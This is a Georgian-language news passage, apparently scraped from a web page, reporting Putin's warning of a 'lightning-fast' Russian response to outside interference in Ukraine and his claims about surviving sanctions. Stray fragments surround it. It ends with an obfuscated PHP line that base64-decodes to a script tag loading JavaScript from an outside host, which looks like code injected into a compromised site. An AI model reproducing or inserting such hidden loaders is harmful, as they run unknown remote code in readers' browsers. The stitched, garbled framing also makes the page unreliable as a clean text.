celsiusi
ავერსი საქკაბელი
რუსეთის პრეზიდენტმა ვლადიმერ პუტინმა განაცხადა, თუ ვინმე გარედან უკრაინის საკითხში ჩარევას შეეცდება, რუსეთის პასუხი ელვისებური იქნება. 
 
მისივე თქმით, ყველა გადაწყვეტილება იმის შესახებ, თუ როგორ მოახდენს მოსკოვი ამ სიტუაციაში რეაგირებას, უკვე მიღებულია.
 
"თუ ვინმე გარედან უკრაინის [საკითხში] ჩარევას შეეცდება, ჩვენი პასუხი ელვისებური იქნება. ჩვენ გვაქვს ყველა ინსტრუმენტი [პასუხისთვის], რომლითაც ვერავინ დაიკვეხნის. ჩვენ ამით ტრაბახს არ ვაპირებთ, გამოვიყენებთ მათ საჭიროების შემთხვევაში", - განაცხადა პუტინმა.
 
სანქტ-პეტერბურგში რუს დეპუტატებთან სიტყვით გამოსვლისას, დასავლური ქვეყნები იმაშიც დაადანაშაულა, რომ მათ უკრაინას რუსეთთან კონფლიქტში უბიძგეს. პუტინმა ასევე აღნიშნა, რომ დასავლეთს რუსეთის დაყოფა სხვადასხვა ნაწილად სურდა.
 
პუტინის თქმით, რუსულმა რუბლმა, საბანკო სისტემამ, სატრანსპორტო სექტორმა და მთლიანად ეკონომიკამ ოფიციალური მოსკოვის წინააღმდეგ დაწესებულ სანქციებს გაუძლო. კრემლის ლიდერმა რუსეთის იზოლაციის მცდელობებისთვის პასუხის გაცემის პირობაც დადო.
917
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");